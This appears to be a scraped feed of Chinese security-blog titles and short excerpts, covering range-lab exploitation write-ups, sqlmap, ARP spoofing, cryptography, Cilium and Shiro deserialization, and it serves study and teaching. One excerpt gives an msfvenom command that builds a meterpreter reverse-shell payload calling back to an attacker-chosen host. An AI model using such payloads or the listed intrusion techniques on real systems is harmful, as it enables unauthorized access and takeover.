pikachu靶场-垂直/水平越权
地址:http://110.40.200.174:204/vul/overpermission/op1/op1_login.php。查看tips,分别登陆两个账号,发现admin账号有修改权限,另一个pikachu账号是普通账号,只有查看权限。修改url为其他人的name,如lucy-》lili。A
BLE协议--SMP(安全管理协议)
SMP即Security Manager Protocol。其内容主要是配对和Key的分发,然后用Key对链路或数据进行加密。双方要共同拥有一个加密key(LTK,Long Term Key)。这个key至关重要,怎么生成、怎么由通信的双方共享,关系到加密的成败。因此蓝牙协议定义了一系列的复杂机制,
sqlmap渗透实战进阶技巧
sqlmap实战渗透进阶技巧
信息安全导论习题及答案
信息安全导论习题
【云原生利器之Cilium】什么是Cilium
Cilium 是一个在 eBPF 之上设计的开源项目,旨在满足容器工作负载的网络、安全和可观测性要求。它在 eBPF 之上提供了一个高级抽象。Cilium 之于 eBPF,就像 Kubernetes 和容器运行时之于 Linux 内核namespace、cgroups 和 seccomp。.....
打穿内网之Vulntarget-a靶场实战记录
内容包括:通达OA未授权上传+文件包含RCE、Redis未授权写马、ms17-010永恒之蓝、代理转发内网跳板、CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动、cobalt strike与msf的shell传递
商用密码应用安全性评估----技术层面实现
商用密码安全性评估
Linux搭建YUM仓库
目录一、yum仓库简介1.1简介1.2yum的实现过程原理二、yum配置文件以及操作2.1 配置YUM本地仓库2.2安装httpd服务三、采用内网搭建yum仓库3.1http方式内网环境搭建yum仓库3.2 ftp方式搭建yum仓库四、总结一、yum仓库简介1.1简介基于RPM包构建的软件更新机制
Win7 您需要Trustedinstaller 提供的权限才能对此文件夹进行更改
Win7系统 您需要Trustedinstaller 提供的权限才能对此文件夹进行更改
msf生成木马
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindow
什么叫做信息安全?包含哪些内容?与网络安全有什么区别?
生活中我们经常会听到要保障自己的或者企业的信息安全。那到底什么是信息安全呢?信息安全包含哪些内容?与网络安全又有什么区别呢?今天我们就一起来详细了解一下。
密码学的应用
密钥的产生密钥的分发密钥的更新密钥的存储和备份密钥的撤销和销毁1.密钥的产生手工方式:应考虑密钥空间、弱密钥问题,例如:姓名、生日、常用单词等,这样的密钥都是弱密钥。字典攻击可破解40%的密钥。解决方法:增加复杂性、随机机自动方式:更好的方式用自动处理设备产生的随机位串随机噪声伪随机位串2.密钥的分
python编写arp攻击与欺骗脚本
目录1.arp欺骗2.arp欺骗实验2.1 构造arp包2.2 发送数据包2.3 查看路由表3.完善arp欺骗过程4. 编写arp欺骗脚本1.arp欺骗arp欺骗是数据链路层的攻击,在数据链路层是通过mac地址来发送报文的,所以需要将网络层的ip对应到mac地址,由于arp协议是基于局域网内主机互相
解决谷歌浏览器你的时钟快了和证书问题
解决你的时钟快了和证书问题
VLAN基本配置(Cisco Packet Tracer )
VLAN基本配置1.实验目的(1)熟悉 VLAN的创建。(2)把交换机接口划分到特定的VLAN。(3)配置交换机的端口安全特性。(4)配置管理VLAN。2.实验拓扑连接线:使用直通线连接3.实验步骤(1)在划分VLAN前﹐配置路由器Rl和R2的e0/0接口,从R1 上 ping 192.168.1
java实现【国密SM4】加密解密-CBC模式
网上有很多个版本,但是算法都是一样的,有可能使用相同的参数来加密解密文本得到的加密字符是不一样的。在此统一说下。SM4实现的功能商业加密。SM4功能是加密文本。例如客户A把字符串"hello world"通过SM4的cbc模式加密后得到密文"234a",然后把密文发送给客户B,客户B通过SM4解密,
vue项目安全漏洞扫描和修复
4.启动服务,不出意外的话,vue.config.js 的配置会有报错,因为webpack4和5有一部分的配置不一样。2. 让audit fix安装SemVer-major更新到顶层依赖,而不仅仅是semver兼容的依赖。3.升级后,如果原项目webpack是4,需要升级到webpack5。1.扫描
共享文件夹/盘加密方法:(指定电脑或者拥有用户名和密码才能访问)
除去everyone都能访问共享文件夹/盘,让你的共享更有隐私性。
SaaS行业的六大安全问题
现代组织正在摆脱传统的本地软件和随附的基础设施,转而支持软件即服务产品。
shiro漏洞原理以及检测key值原理
Shiro 1.2.4及之前的版本中,AES加密的密钥默认硬编码在代码里(SHIRO-550),Shiro 1.2.4以上版本官方移除了代码中的默认密钥,要求开发者自己设置,如果开发者没有设置,则默认动态生成,降低了固定密钥泄漏的风险。升级shiro版本并不能根本解决反序列化漏洞,代码复用会直接导致
